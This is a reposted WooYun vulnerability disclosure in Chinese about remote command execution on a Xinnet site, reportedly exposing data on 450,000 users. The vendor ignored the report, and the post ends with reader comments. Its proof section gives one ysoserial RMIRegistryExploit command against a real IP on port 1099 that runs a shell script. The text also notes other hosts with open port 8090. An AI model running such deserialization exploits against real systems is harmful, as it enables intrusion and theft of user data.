新网某站命令执行45万用户信息泄露

admin 2017年5月1日21:14:37评论324 views字数 225阅读0分45秒阅读模式
摘要

2016-06-12: 细节已通知厂商并且等待厂商处理中
2016-06-12: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-18: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(30) 关注此漏洞

缺陷编号: WooYun-2016-218620

漏洞标题: 新网某站命令执行45万用户信息泄露

相关厂商: 北京新网互联科技有限公司

漏洞作者: 小川新网某站命令执行45万用户信息泄露

提交时间: 2016-06-12 22:46

公开时间: 2016-06-18 10:40

漏洞类型: 系统/服务补丁不及时

危害等级: 高

自评Rank: 20

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 远程代码执行

1人收藏


漏洞详情

披露状态:

2016-06-12: 细节已通知厂商并且等待厂商处理中
2016-06-12: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

大象,大象,大象,大象

详细说明:

新网某站命令执行45万用户信息泄露

漏洞证明:

java -cp ysoserial-0.0.4-all.jar ysoserial.exploit.RMIRegistryExploit 58.221.79.43 1099 CommonsCollections1 "/tmp/my.sh"

新网某站命令执行45万用户信息泄露

修复方案:

其他ip我没有日,但是都开着8090端口,对应一个系统,我就放过他们了,请一并修复

版权声明:转载请注明来源 小川@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-06-18 10:40

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2016-06-12 22:54 | shlhack‘s bother ( 普通白帽子 | Rank:395 漏洞数:139 | 以前有个梦,后来我醒了)

    0

    1楼围观表哥

  2. 2016-06-12 23:12 | 陆由乙 ( 普通白帽子 | Rank:620 漏洞数:137 | 我是突突兔!)

    0

    川神又出手了。

  3. 2016-06-12 23:16 | Uknow ( 普通白帽子 | Rank:174 漏洞数:51 | 求团队!!!!)

    0

    暴漫拖更了,川神!

  4. 2016-06-13 10:04 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    0

    NB!

  5. 2016-06-13 11:06 | 黑骑士 ( 普通白帽子 | Rank:121 漏洞数:22 | 黑色的骑士守护着光明)

    0

    期待暴漫好久了

  6. 2016-06-14 13:17 | 小川 新网某站命令执行45万用户信息泄露 ( 核心白帽子 | Rank:1627 漏洞数:242 | 一个致力要将乌云变成搞笑论坛的男人)

    0

    我擦~,我竟然选错厂商了..........@xsser

  7. 2016-06-18 12:21 | 欧尼酱 ( 路人 | Rank:15 漏洞数:7 | 技术马马虎虎)

    0

    膜拜

  8. 2016-06-18 15:37 | 哇哈哈 ( 路人 | Rank:2 漏洞数:1 | 啥都不会)

    0

    我擦 这个报告真6

  9. 2016-06-18 23:27 | dragon110 ( 路人 | Rank:12 漏洞数:6 | 其实我是龙6)

    0

    期待暴漫

  10. 2016-06-19 19:29 | _Evil ( 普通白帽子 | Rank:431 漏洞数:61 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    0

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin